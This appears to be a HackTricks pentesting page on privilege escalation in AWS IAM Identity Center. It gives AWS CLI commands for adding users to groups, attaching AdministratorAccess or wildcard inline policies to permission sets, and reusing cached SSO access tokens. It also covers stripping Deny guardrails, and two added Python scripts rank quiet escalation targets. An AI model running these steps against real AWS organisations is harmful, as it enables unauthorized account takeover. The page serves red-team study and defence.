{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
{% endhint %}
For more information about AWS Identity Center / AWS SSO check:
{% content-ref url="../aws-services/aws-iam-enum.md" %} aws-iam-enum.md {% endcontent-ref %}
{% hint style="warning" %}
Note that by default only principals from the Management Account can access and administer IAM Identity Center.
Principals from any other account can only manage it if that account has been registered as a Delegated Administrator for Identity Center.
Check the docs for more info.
{% endhint %}
A straightforward escalation path would be a permission that allows resetting users' passwords. Unfortunately the API can only send a password-reset email to the user, so you would also need access to that user's mailbox.
With `identitystore:CreateGroupMembership` it's possible to add a user to a group, so the user inherits every account assignment (and therefore every permission set) the group has.
{% code overflow="wrap" %}
```bash
aws identitystore create-group-membership --identity-store-id <store-id> --group-id <group-id> --member-id UserId=<user-id>
```
{% endcode %}
An attacker with `sso:PutInlinePolicyToPermissionSet` could grant extra permissions to a Permission Set that is already assigned to a user under their control. The change only reaches the member accounts after the set is re-provisioned, so `sso:ProvisionPermissionSet` is needed as well. Provisioning is asynchronous: `provision-permission-set` returns a `RequestId` that can be polled with `aws sso-admin describe-permission-set-provisioning-status` until its `Status` is `SUCCEEDED`.
{% code overflow="wrap" %}
```bash
# Write an inline policy with admin privileges
cat > /tmp/policy.json <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "Statement1",
      "Effect": "Allow",
      "Action": ["*"],
      "Resource": ["*"]
    }
  ]
}
EOF
# Attach it to the permission set
aws sso-admin put-inline-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --inline-policy file:///tmp/policy.json
# Re-provision so the new policy is pushed to every account where the set is already provisioned
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
```
{% endcode %}
An attacker with `sso:AttachManagedPolicyToPermissionSet` could attach an AWS managed policy such as `AdministratorAccess` to a Permission Set that is assigned to a user under their control. As before, the change is only pushed to the accounts after re-provisioning (`sso:ProvisionPermissionSet`).
{% code overflow="wrap" %}
```bash
# Attach the AdministratorAccess managed policy to the permission set
aws sso-admin attach-managed-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess"
# Re-provision so the new policy is attached to the role in every provisioned account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
```
{% endcode %}
An attacker with `sso:AttachCustomerManagedPolicyReferenceToPermissionSet` could attach a customer managed policy to a Permission Set that is assigned to a user under their control. The reference is by name and path, not by ARN, and the policy is resolved separately in each member account.
{% hint style="warning" %} To abuse this you need to know the name (and path) of a customer managed policy that exists in ALL the accounts where the permission set is provisioned; provisioning fails for any account where that policy is missing. {% endhint %}
{% code overflow="wrap" %}
```bash
# Reference a customer managed policy (by name and path) from the permission set
aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --customer-managed-policy-reference Name=<customer-managed-policy-name>,Path=/
# Re-provision so the referenced policy is attached to the role in every provisioned account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
```
{% endcode %}
An attacker with `sso:CreateAccountAssignment` could assign an existing Permission Set (for example one that already carries `AdministratorAccess`) to a user or group under their control in a target account. A successful assignment also provisions the set into that account, so no separate `provision-permission-set` call is needed for this step.
{% code overflow="wrap" %}
```bash
aws sso-admin create-account-assignment --instance-arn <instance-arn> --target-id <account_num> --target-type AWS_ACCOUNT --permission-set-arn <permission_set_arn> --principal-type USER --principal-id <principal_id>
```
{% endcode %}
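Before touching a permission set it is worth knowing which sets the controlled user already holds and how many other principals and accounts a change with `ALL_PROVISIONED_ACCOUNTS` would silently escalate. The following is an added example, not code from the original page: it works on constructed dicts shaped like the `sso-admin` responses to `list-accounts-for-provisioned-permission-set` and `list-account-assignments` and the `identitystore` response to `list-group-memberships`. All instance IDs, permission set ARNs, account numbers and principal IDs are invented.

```python
"""Map IAM Identity Center permission sets to the accounts and principals they reach,
to pick a target permission set and measure the blast radius of modifying it.
Added example; the data below is constructed and every identifier is invented."""

from collections import defaultdict

INSTANCE = "ssoins-0000000000000000"                                          # invented
PS_READONLY = f"arn:aws:sso:::permissionSet/{INSTANCE}/ps-aaaaaaaaaaaaaaaa"  # invented
PS_DEVOPS = f"arn:aws:sso:::permissionSet/{INSTANCE}/ps-bbbbbbbbbbbbbbbb"    # invented
PS_ADMIN = f"arn:aws:sso:::permissionSet/{INSTANCE}/ps-cccccccccccccccc"     # invented

# Constructed: per permission set, the AccountIds that ListAccountsForProvisionedPermissionSet returns
PROVISIONED = {
    PS_READONLY: ["111111111111", "222222222222", "333333333333"],
    PS_DEVOPS: ["222222222222"],
    PS_ADMIN: ["111111111111"],
}

# Constructed: ListAccountAssignments output, flattened across accounts and permission sets
ASSIGNMENTS = [
    {"AccountId": "111111111111", "PermissionSetArn": PS_READONLY, "PrincipalType": "USER", "PrincipalId": "u-attacker"},
    {"AccountId": "222222222222", "PermissionSetArn": PS_READONLY, "PrincipalType": "GROUP", "PrincipalId": "g-auditors"},
    {"AccountId": "333333333333", "PermissionSetArn": PS_READONLY, "PrincipalType": "GROUP", "PrincipalId": "g-auditors"},
    {"AccountId": "222222222222", "PermissionSetArn": PS_DEVOPS, "PrincipalType": "USER", "PrincipalId": "u-attacker"},
    {"AccountId": "111111111111", "PermissionSetArn": PS_ADMIN, "PrincipalType": "GROUP", "PrincipalId": "g-platform-admins"},
]

# Constructed: identitystore group memberships, group id -> member user ids
GROUP_MEMBERS = {
    "g-auditors": ["u-alice"],
    "g-platform-admins": ["u-bob"],
}


def principals_controlled(user_id, group_members):
    """The user itself plus every group it belongs to: an assignment to any of these reaches the user."""
    ids = {user_id}
    for gid, members in group_members.items():
        if user_id in members:
            ids.add(gid)
    return ids


def reachable_permission_sets(user_id, assignments, group_members):
    """Permission sets the user can already assume, mapped to the accounts where that assignment exists."""
    controlled = principals_controlled(user_id, group_members)
    reach = defaultdict(set)
    for a in assignments:
        if a["PrincipalId"] in controlled:
            reach[a["PermissionSetArn"]].add(a["AccountId"])
    return dict(reach)


def blast_radius(ps_arn, provisioned, assignments):
    """Accounts and principals affected when ps_arn is changed and re-provisioned with
    --target-type ALL_PROVISIONED_ACCOUNTS: every provisioned account receives the new policy
    and every principal assigned the set in those accounts inherits it."""
    accounts = set(provisioned.get(ps_arn, []))
    principals = {a["PrincipalId"] for a in assignments
                  if a["PermissionSetArn"] == ps_arn and a["AccountId"] in accounts}
    return accounts, principals


def candidate_targets(user_id, provisioned, assignments, group_members):
    """Rank the permission sets the user already holds by how many unrelated principals would be
    escalated alongside them (fewer = quieter change), then by number of provisioned accounts."""
    rows = []
    for ps, own_accounts in reachable_permission_sets(user_id, assignments, group_members).items():
        accounts, principals = blast_radius(ps, provisioned, assignments)
        others = principals - principals_controlled(user_id, group_members)
        rows.append({"PermissionSetArn": ps, "OwnAccounts": sorted(own_accounts),
                     "ProvisionedAccounts": sorted(accounts), "OtherPrincipals": sorted(others)})
    return sorted(rows, key=lambda r: (len(r["OtherPrincipals"]), len(r["ProvisionedAccounts"])))


def add_membership(user_id, group_id, group_members):
    """Model identitystore:CreateGroupMembership: returns the memberships after the user joins the group,
    so that reachable_permission_sets() shows the assignments the user now inherits."""
    updated = {g: list(m) for g, m in group_members.items()}
    updated.setdefault(group_id, [])
    if user_id not in updated[group_id]:
        updated[group_id].append(user_id)
    return updated


if __name__ == "__main__":
    for row in candidate_targets("u-attacker", PROVISIONED, ASSIGNMENTS, GROUP_MEMBERS):
        print(row)
    print(reachable_permission_sets("u-attacker", ASSIGNMENTS,
                                    add_membership("u-attacker", "g-platform-admins", GROUP_MEMBERS)))
```

With real data the same shapes come from `aws sso-admin list-accounts-for-provisioned-permission-set` and `aws sso-admin list-account-assignments --account-id ... --permission-set-arn ...` (one call per account and set), and from `aws identitystore list-group-memberships`. From the defender's side the same ranking reads as an alert list: a set assigned to many principals is the one whose `PutInlinePolicy`/`AttachManagedPolicy` events deserve the most scrutiny.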
With `sso:GetRoleCredentials` it's possible to obtain short-term STS credentials for a permission set (the `--role-name` is the permission set name) in an account where it is assigned to the calling user.
{% code overflow="wrap" %}
```bash
aws sso get-role-credentials --role-name <permission-set-name> --account-id <account-id> --access-token <access-token>
```
{% endcode %}
The access token is the one issued by the Identity Center OIDC device authorization flow (`aws sso-oidc register-client` / `start-device-authorization` / `create-token`). After an `aws sso login` the CLI caches it as `accessToken` in a JSON file under `~/.aws/sso/cache/`, so a token taken from a compromised workstation can be used with this command for as long as it is valid.
An attacker with `sso:DetachManagedPolicyFromPermissionSet` can detach an AWS managed policy from a permission set. If that policy only contains Deny statements (a guardrail), detaching it lifts those restrictions and therefore widens what every principal assigned the set can do; the change reaches the member accounts after re-provisioning.
{% code overflow="wrap" %}
```bash
aws sso-admin detach-managed-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --managed-policy-arn <ManagedPolicyARN>
```
{% endcode %}
An attacker with `sso:DetachCustomerManagedPolicyReferenceFromPermissionSet` can detach a customer managed policy reference from a permission set. As above, if the referenced policy is a Deny-only guardrail, detaching it widens the effective permissions of everyone assigned the set.
{% code overflow="wrap" %}
```bash
aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --customer-managed-policy-reference Name=<customer-managed-policy-name>,Path=/
```
{% endcode %}
An attacker with `sso:DeleteInlinePolicyFromPermissionSet` can delete the inline policy of a permission set. If that inline policy only contains Deny statements, deleting it lifts those restrictions and widens the effective permissions of everyone assigned the set.
{% code overflow="wrap" %}
```bash
aws sso-admin delete-inline-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>
```
{% endcode %}
An attacker with `sso:DeletePermissionsBoundaryFromPermissionSet` can remove the permissions boundary of a permission set. A boundary only caps what the set's policies may grant, so removing it never narrows and can only widen the effective permissions of everyone assigned the set.
{% code overflow="wrap" %}
```bash
aws sso-admin delete-permissions-boundary-from-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn>
```
{% endcode %}
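The four detach/delete operations above only escalate when what is being removed is a restriction rather than a grant. The following is an added example, not code from the original page: given a permission set whose attachments have been fetched (managed policies, customer managed policy references, inline policy and boundary, shaped like the `sso-admin` `list-managed-policies-in-permission-set`, `list-customer-managed-policy-references-in-permission-set`, `get-inline-policy-for-permission-set` and `get-permissions-boundary-for-permission-set` responses, with the policy documents looked up separately), it lists which of those operations can only widen access and which explicit denies disappear. The permission set, its ARN and every policy document are constructed; `PowerUserAccess` is a real AWS managed policy name but its document here is a simplified stand-in.

```python
"""Decide which detach/delete operations on an Identity Center permission set widen its effective
permissions. Added example; the permission set and all policy documents are constructed."""

import json

POWER_USER_DOC = {  # constructed, simplified stand-in for an Allow-based managed policy
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "NotAction": ["iam:*", "organizations:*"], "Resource": "*"}],
}
DENY_ORG_LEAVE_DOC = {  # constructed Deny-only guardrail; note the single statement object, which IAM allows
    "Version": "2012-10-17",
    "Statement": {"Effect": "Deny", "Action": ["organizations:LeaveOrganization"], "Resource": "*"},
}
INLINE_DOC = json.dumps({  # constructed Deny-only inline policy; the API returns it as a JSON string
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Deny", "Action": "s3:DeleteBucket", "Resource": "*"},
        {"Effect": "Deny", "Action": "ec2:TerminateInstances", "Resource": "*"},
    ],
})

PERMISSION_SET = {  # constructed; every ARN and name is invented
    "Name": "DevOps",
    "PermissionSetArn": "arn:aws:sso:::permissionSet/ssoins-0000000000000000/ps-bbbbbbbbbbbbbbbb",
    "AttachedManagedPolicies": [
        {"Name": "PowerUserAccess", "Arn": "arn:aws:iam::aws:policy/PowerUserAccess", "Document": POWER_USER_DOC},
    ],
    "CustomerManagedPolicyReferences": [
        {"Name": "DenyOrgLeave", "Path": "/", "Document": DENY_ORG_LEAVE_DOC},
    ],
    "InlinePolicy": INLINE_DOC,
    "PermissionsBoundary": {"ManagedPolicyArn": "arn:aws:iam::aws:policy/PowerUserAccess"},
}


def statements(policy):
    """Normalise a policy document (dict or JSON string) to a list of statements."""
    if isinstance(policy, str):
        policy = json.loads(policy)
    stmts = policy.get("Statement", [])
    return stmts if isinstance(stmts, list) else [stmts]


def actions_of(stmt):
    """Action may be a single string or a list; NotAction statements contribute no explicit action."""
    acts = stmt.get("Action", [])
    return [acts] if isinstance(acts, str) else list(acts)


def is_deny_only(policy):
    """True when the document grants nothing: detaching it can only lift restrictions."""
    stmts = statements(policy)
    return bool(stmts) and all(s.get("Effect") == "Deny" for s in stmts)


def attached_documents(ps):
    docs = [mp["Document"] for mp in ps.get("AttachedManagedPolicies", [])]
    docs += [c["Document"] for c in ps.get("CustomerManagedPolicyReferences", [])]
    if ps.get("InlinePolicy"):
        docs.append(ps["InlinePolicy"])
    return docs


def widening_removals(ps):
    """The sso-admin operations (subcommand, target) that can only widen what the set's principals may do.
    Policies carrying Allow statements are skipped: detaching those narrows access instead."""
    ops = []
    for mp in ps.get("AttachedManagedPolicies", []):
        if is_deny_only(mp["Document"]):
            ops.append(("detach-managed-policy-from-permission-set", mp["Arn"]))
    for ref in ps.get("CustomerManagedPolicyReferences", []):
        if is_deny_only(ref["Document"]):
            ops.append(("detach-customer-managed-policy-reference-from-permission-set",
                        f"Name={ref['Name']},Path={ref['Path']}"))
    if ps.get("InlinePolicy") and is_deny_only(ps["InlinePolicy"]):
        ops.append(("delete-inline-policy-from-permission-set", ps["PermissionSetArn"]))
    if ps.get("PermissionsBoundary"):
        # A boundary only caps the grants; removing it never narrows, so it always qualifies.
        ops.append(("delete-permissions-boundary-from-permission-set", ps["PermissionSetArn"]))
    return ops


def restrictions_lifted(ps):
    """Actions that stop being explicitly denied once every Deny-only attachment is removed."""
    lifted = set()
    for doc in attached_documents(ps):
        if is_deny_only(doc):
            for s in statements(doc):
                lifted.update(actions_of(s))
    return sorted(lifted)


if __name__ == "__main__":
    for op, target in widening_removals(PERMISSION_SET):
        print(f"aws sso-admin {op} ... {target}")
    print("explicit denies lifted:", restrictions_lifted(PERMISSION_SET))
```

Read defensively, a permission set whose only restrictions are Deny statements and a boundary is exactly as strong as the `sso:Detach*`/`sso:Delete*` permissions guarding it; the robust design keeps the guardrails in Service Control Policies, which none of the operations on this page can touch.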